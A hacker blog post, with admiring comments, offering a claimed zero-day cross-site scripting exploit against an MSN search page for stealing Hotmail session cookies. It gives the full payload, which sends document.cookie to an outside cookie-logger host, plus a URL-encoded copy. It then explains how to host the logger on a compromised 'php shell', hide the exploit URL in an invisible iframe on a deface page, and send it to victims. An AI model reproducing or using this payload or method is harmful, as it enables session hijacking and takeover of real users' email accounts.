Share

[0dAy] Hotmail XSS Vuln. Exploitation to cookies logging [English]

Hi all,

today i made a quick video tut for anew 0day Hotmail xss vuln.

Vuln By : al74arbi

Exploited By : faris

all you need is the cookie logger script

u can get it from here

http://pastebin.com/mZCMRcGC



and the rest at the video , right here

http://www.mirrorcreator.com/files/ITURORZD/hotmail_xss_exploit_En.rar_links

video's text if u are experienced xss exploiter

 | HaCKeR-MaN
| sec4ever.com , alm3refh.com , 7rs.cc
| personal Blog : 1337r1z.wordpress.com


Hello,
let's do it :)
this is the full exploit
http://glo.msn.com/search?searchTerm="><object data="javascript:document.location='http://www.viagra-pharma.com/co.php?c='.concat(escape(document.cookie));"></script>
let's see how will we make it
1st go to any php shell u got
make file underthe name of co.php
put the code on it
(code in the topic)
2nd we will use the iframe to hide the exploit url
make any html page
u can put ur html deface page or any stuff u like
<iframe id="rf" src="" allowtransparency="true" style="display:none;" scrolling="auto"  frameborder="0">
and put this code before </html>
now open coder
u can download it from bindshell
code the following code to http(full)
"><object data="javascript:document.location='http://www.viagra-pharma.com/co.php?c='.concat(escape(document.cookie));"></script>
after editing http://www.viagra-pharma.com/co.php to ur cookie logger url of cource :)
now edit the original exploit url
so it will be
http://glo.msn.com/search?searchTerm=%22%3E%3C%6F%62%6A%65%63%74%20%64%61%74%61%3D%22%6A%61%76%61%73%63%72%69%70%74%3A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%76%69%61%67%72%61%2D%70%68%61%72%6D%61%2E%63%6F%6D%2F%63%6F%2E%70%68%70%3F%63%3D%27%2E%63%6F%6E%63%61%74%28%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%29%3B%22%3E%3C%2F%73%63%72%69%70%74%3E
now insert this uel at scr="url here"]
safe ur page
now send it to ur victime
like this
and we got it :)


Greets to Karar , H311 C0D3 , Lagripe-Dz , Red virus , T3rrorist , the injector , Orange-Man , Fox-hacker , sec-mind , zaid , sa^Devil , Xss-Man , Raymon , Maestro-dz , sharp-hack and all [Eg,Ps,Dz,Ma,Sy] HaCKeRs

Enjoy :)
./faris

13 comments:

Th3 MMA said...

thnx firs ! miss ur mind really ! , ... cheak it ! nd back if there are any QUE :D

Security-Mind said...

woooooooooooow, great work bro
keep it up ;) and thanx on greetz

orangman said...

كبير يفارس كبير والله

Lagripe-Dz said...

nice 1 faris , thanks 4 sharing :D

HaCkEr 20 said...

مبدع يالغالي وعساك على القوة

HaCkEr 20 said...

مبدع حبيب قلبي ابو الفوارس

dR.BaNnEd said...

الله لا يهينك

شرح وافي ^_*


تحياتي لك

The Injector said...

يا عيني عليك يا معلم .. توب التوب :)

n477 said...

Nice 0-DAY.

Will become very useful.

RaYm0n said...

جميل جدا منك اخي فارس

n477 said...

With all respect, Does people have tool "Coder" ? for download to encode http (Full)

Faris said...

hi bro
in my tut i said that they can download it from bind shell :)
any way this is the link http://www.bindshell.net/tools.html
peace

#~Pirate said...

nice 1 but incomplete im workin on it send me ur mail to work wz me 0n it

Post a Comment